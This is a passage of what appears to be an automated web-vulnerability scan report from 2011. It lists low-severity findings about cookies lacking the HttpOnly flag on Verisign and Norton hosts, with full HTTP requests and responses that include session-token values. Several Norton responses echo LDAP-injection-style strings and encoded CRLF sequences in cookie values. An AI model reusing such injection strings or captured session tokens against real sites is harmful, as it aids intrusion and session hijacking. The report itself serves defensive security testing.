The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/b_shadow.png HTTP/1.1
Host: vipmobile.verisign.com
Proxy-Connection: keep-alive
Referer: http://vipmobile.verisign.com/home.v
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 22:03:58 GMT
Server: Apache
Set-Cookie: JSESSIONID=806370F1B7465CBED58C1BE853F86CDD.tomcat2; Path=/
Accept-Ranges: bytes
ETag: W/"2822-1312807390000"
Last-Modified: Mon, 08 Aug 2011 12:43:10 GMT
Content-Length: 2822
Content-Type: image/png

...[SNIP]...

10.35. http://vipmobile.verisign.com/images/bl_shadow.png

Summary

Severity:   Low
Confidence:   Firm
Host:   http://vipmobile.verisign.com
Path:   /images/bl_shadow.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/bl_shadow.png HTTP/1.1
Host: vipmobile.verisign.com
Proxy-Connection: keep-alive
Referer: http://vipmobile.verisign.com/home.v
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 22:03:58 GMT
Server: Apache
Set-Cookie: JSESSIONID=4C16EF1CD603E479FE111492DDD71824.tomcat2; Path=/
Accept-Ranges: bytes
ETag: W/"3072-1312807392000"
Last-Modified: Mon, 08 Aug 2011 12:43:12 GMT
Content-Length: 3072
Content-Type: image/png

...[SNIP]...

10.36. http://vipmobile.verisign.com/images/br_shadow.png

Summary

Severity:   Low
Confidence:   Firm
Host:   http://vipmobile.verisign.com
Path:   /images/br_shadow.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/br_shadow.png HTTP/1.1
Host: vipmobile.verisign.com
Proxy-Connection: keep-alive
Referer: http://vipmobile.verisign.com/home.v
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 22:03:58 GMT
Server: Apache
Set-Cookie: JSESSIONID=0CBB339A5F3FC6CA6B3243DB5693898F.tomcat2; Path=/
Accept-Ranges: bytes
ETag: W/"3116-1312807392000"
Last-Modified: Mon, 08 Aug 2011 12:43:12 GMT
Content-Length: 3116
Content-Type: image/png

...[SNIP]...

10.37. http://vipmobile.verisign.com/images/dot.gif

Summary

Severity:   Low
Confidence:   Firm
Host:   http://vipmobile.verisign.com
Path:   /images/dot.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/dot.gif HTTP/1.1
Host: vipmobile.verisign.com
Proxy-Connection: keep-alive
Referer: http://vipmobile.verisign.com/home.v
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 22:03:58 GMT
Server: Apache
Set-Cookie: JSESSIONID=BC68623295528D6637E6ECFE1FA511A9.tomcat2; Path=/
Accept-Ranges: bytes
ETag: W/"43-1312807392000"
Last-Modified: Mon, 08 Aug 2011 12:43:12 GMT
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

10.38. http://vipmobile.verisign.com/images/home_rght_box.gif

Summary

Severity:   Low
Confidence:   Firm
Host:   http://vipmobile.verisign.com
Path:   /images/home_rght_box.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/home_rght_box.gif HTTP/1.1
Host: vipmobile.verisign.com
Proxy-Connection: keep-alive
Referer: http://vipmobile.verisign.com/home.v
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 22:03:58 GMT
Server: Apache
Set-Cookie: JSESSIONID=5B016AD80C52B4540E9C0C7B68B7A4D7.tomcat2; Path=/
Accept-Ranges: bytes
ETag: W/"7996-1312807394000"
Last-Modified: Mon, 08 Aug 2011 12:43:14 GMT
Content-Length: 7996
Content-Type: image/gif

GIF89a7.A..............................................................................................................................................................................................
...[SNIP]...

10.39. http://vipmobile.verisign.com/images/r_shadow.png

Summary

Severity:   Low
Confidence:   Firm
Host:   http://vipmobile.verisign.com
Path:   /images/r_shadow.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/r_shadow.png HTTP/1.1
Host: vipmobile.verisign.com
Proxy-Connection: keep-alive
Referer: http://vipmobile.verisign.com/home.v
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 22:03:58 GMT
Server: Apache
Set-Cookie: JSESSIONID=0F41858F0BA8CAFB3B967BE1BD5FBA25.tomcat2; Path=/
Accept-Ranges: bytes
ETag: W/"2817-1312807394000"
Last-Modified: Mon, 08 Aug 2011 12:43:14 GMT
Content-Length: 2817
Content-Type: image/png

...[SNIP]...

10.40. http://vipmobile.verisign.com/images/rt_shadow.png

Summary

Severity:   Low
Confidence:   Firm
Host:   http://vipmobile.verisign.com
Path:   /images/rt_shadow.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/rt_shadow.png HTTP/1.1
Host: vipmobile.verisign.com
Proxy-Connection: keep-alive
Referer: http://vipmobile.verisign.com/home.v
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 22:03:59 GMT
Server: Apache
Set-Cookie: JSESSIONID=39BCE0979E896FBFC247F406B455ECFD.tomcat2; Path=/
Accept-Ranges: bytes
ETag: W/"3050-1312807394000"
Last-Modified: Mon, 08 Aug 2011 12:43:14 GMT
Content-Length: 3050
Content-Type: image/png

...[SNIP]...

10.41. http://vipmobile.verisign.com/images/topleft.gif

Summary

Severity:   Low
Confidence:   Firm
Host:   http://vipmobile.verisign.com
Path:   /images/topleft.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/topleft.gif HTTP/1.1
Host: vipmobile.verisign.com
Proxy-Connection: keep-alive
Referer: http://vipmobile.verisign.com/home.v
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 22:03:59 GMT
Server: Apache
Set-Cookie: JSESSIONID=31209521096AE0F9176A973D15DA8603.tomcat2; Path=/
Accept-Ranges: bytes
ETag: W/"59-1312807394000"
Last-Modified: Mon, 08 Aug 2011 12:43:14 GMT
Content-Length: 59
Content-Type: image/gif

GIF89a..
..........!.......,......
.......`y. d..Co.[.y...;

10.42. https://vipmobile.verisign.com/fpa/fpa.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://vipmobile.verisign.com
Path:   /fpa/fpa.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fpa/fpa.jsp HTTP/1.1
Host: vipmobile.verisign.com
Connection: keep-alive
Referer: https://vipmobile.verisign.com/home.v
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.11.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; JSESSIONID=5B879E00A090344FCA461344644F595F.tomcat1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:52:08 GMT
Server: Apache
Set-Cookie: JSESSIONID=6F5A301A8F818418D8466F49AD192735.tomcat1; Path=/fpa; Secure
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/javascript
Content-Length: 108420


var urlProtocol = ('https:' == document.location.protocol ? 'https://' : 'http://');

   // Customizable variables
var hostUri = urlProtocol + "vipmobile.verisign.com/fpa";
var cookieDomain = '.v
...[SNIP]...

10.43. http://buy.norton.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://buy.norton.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:24 GMT
Location: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=3bf0ac89-952a-4b3e-84b4-5a334e35934e1315604244143
Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16b8014%250d%250ae956c741f6e; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LANGUAGE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID_CREATED_DATE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAM_TYPE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:2053e95%250d%250ad87014f842f; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=US; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:24 GMT; path=/
Set-Cookie: LANGUAGE=en; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:24 GMT; path=/
Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:24 GMT; path=/
Set-Cookie: PROGRAMID=; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:24 GMT; path=/
Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:24 GMT; path=/
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:37:24; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:24 GMT; path=/
Set-Cookie: TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:24 GMT; path=/
Set-Cookie: OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:24 GMT; path=/
Set-Cookie: CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:24 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 413

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://buy.norton.com/estore/mf/la
...[SNIP]...

10.44. http://buy.norton.com/ps

Summary

Severity:   Information
Confidence:   Certain
Host:   http://buy.norton.com
Path:   /ps

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ps HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:23 GMT
Location: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=18a29e71-5447-4147-9046-865f8a1fce521315604243554
Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16b8014%250d%250ae956c741f6e; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LANGUAGE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID_CREATED_DATE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAM_TYPE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:2053e95%250d%250ad87014f842f; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=US; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
Set-Cookie: LANGUAGE=en; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
Set-Cookie: PROGRAMID=; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:37:23; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
Set-Cookie: TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
Set-Cookie: OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
Set-Cookie: CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 413

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://buy.norton.com/estore/mf/la
...[SNIP]...

10.45. http://buy.norton.com/special-promotions

Summary

Severity:   Information
Confidence:   Certain
Host:   http://buy.norton.com
Path:   /special-promotions

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /special-promotions HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:25 GMT
Location: http://buy.norton.com/estore/mf/landingPromotion?rdid=4d1e0611-4d59-4d29-9f22-ad1cbf72a98d1315604245447
Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16b8014%250d%250ae956c741f6e; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LANGUAGE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID_CREATED_DATE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAM_TYPE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:2053e95%250d%250ad87014f842f; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=US; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
Set-Cookie: LANGUAGE=en; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
Set-Cookie: PROGRAMID=; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:37:25; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
Set-Cookie: TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
Set-Cookie: OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
Set-Cookie: CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 401

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://buy.norton.com/estore/mf/la
...[SNIP]...

10.46. http://buy.norton.com/support

Summary

Severity:   Information
Confidence:   Certain
Host:   http://buy.norton.com
Path:   /support

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /support HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:38:21 GMT
Location: http://www.norton.com/onlinehelp
Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16b8014%250d%250ae956c741f6e; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LANGUAGE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID_CREATED_DATE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAM_TYPE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:2053e95%250d%250ad87014f842f; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=*)!(sn=*)!(sn=*; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
